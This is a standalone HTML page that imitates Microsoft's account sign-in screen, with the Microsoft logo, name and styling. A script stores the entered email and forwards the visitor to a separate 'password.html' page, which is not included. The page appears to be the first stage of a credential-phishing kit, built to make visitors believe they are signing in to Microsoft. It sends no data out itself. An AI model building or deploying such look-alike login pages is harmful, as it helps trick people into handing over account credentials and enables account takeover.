<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Sign in to your account</title>
  <style>
    body {
      margin: 0;
      font-family: "Segoe UI", sans-serif;
      background: radial-gradient(circle at 70% 30%, #f6f8fb, #ececfb);
      height: 100vh;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
    }

    .login-box {
      background: white;
      width: 420px;
      box-shadow: 0 0 20px rgba(0,0,0,0.1);
      padding: 40px;
      box-sizing: border-box;
    }

    .ms-header {
      display: flex;
      align-items: center;
      gap: 10px;
      margin-bottom: 30px;
    }

    .ms-header img {
      height: 28px;
    }

    .ms-header span {
      font-size: 20px;
      color: #222;
      font-weight: 600;
    }

    h2 {
      font-size: 20px;
      font-weight: normal;
      margin-bottom: 20px;
    }

    input[type="text"] {
      width: 100%;
      padding: 10px 0;
      font-size: 16px;
      border: none;
      border-bottom: 1px solid #999;
      outline: none;
    }

    .links {
      margin-top: 15px;
      font-size: 13px;
    }

    .links a {
      color: #0067b8;
      text-decoration: none;
    }

    button {
      background-color: #0078d4;
      color: white;
      border: none;
      padding: 10px 20px;
      font-size: 15px;
      float: right;
      margin-top: 30px;
      cursor: pointer;
    }

    .signin-options {
      width: 420px;
      margin-top: 20px;
      background: white;
      padding: 15px;
      text-align: left;
      font-size: 14px;
      box-shadow: 0 0 20px rgba(0,0,0,0.1);
      display: flex;
      align-items: center;
      gap: 8px;
      box-sizing: border-box;
    }

    .signin-options::before {
      content: '🔑';
      font-size: 16px;
    }
  </style>
</head>
<body>

  <div class="login-box">
    <div class="ms-header">
      <img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft logo">
      <span>Microsoft</span>
    </div>

    <h2>Sign in</h2>

    <input type="text" placeholder="Email, phone, or Skype" id="email" />

    <div class="links">
      <p><a href="#">No account? Create one!</a></p>
      <p><a href="#">Can’t access your account?</a></p>
    </div>

    <button onclick="goToPasswordPage()">Next</button>
  </div>

  <div class="signin-options">
    Sign-in options
  </div>

  <script>
    function goToPasswordPage() {
      const email = document.getElementById("email").value.trim();
      if (email) {
        localStorage.setItem("login_email", email);
        window.location.href = "password.html";
      } else {
        alert("Please enter an email.");
      }
    }
  </script>
</body>
</html>
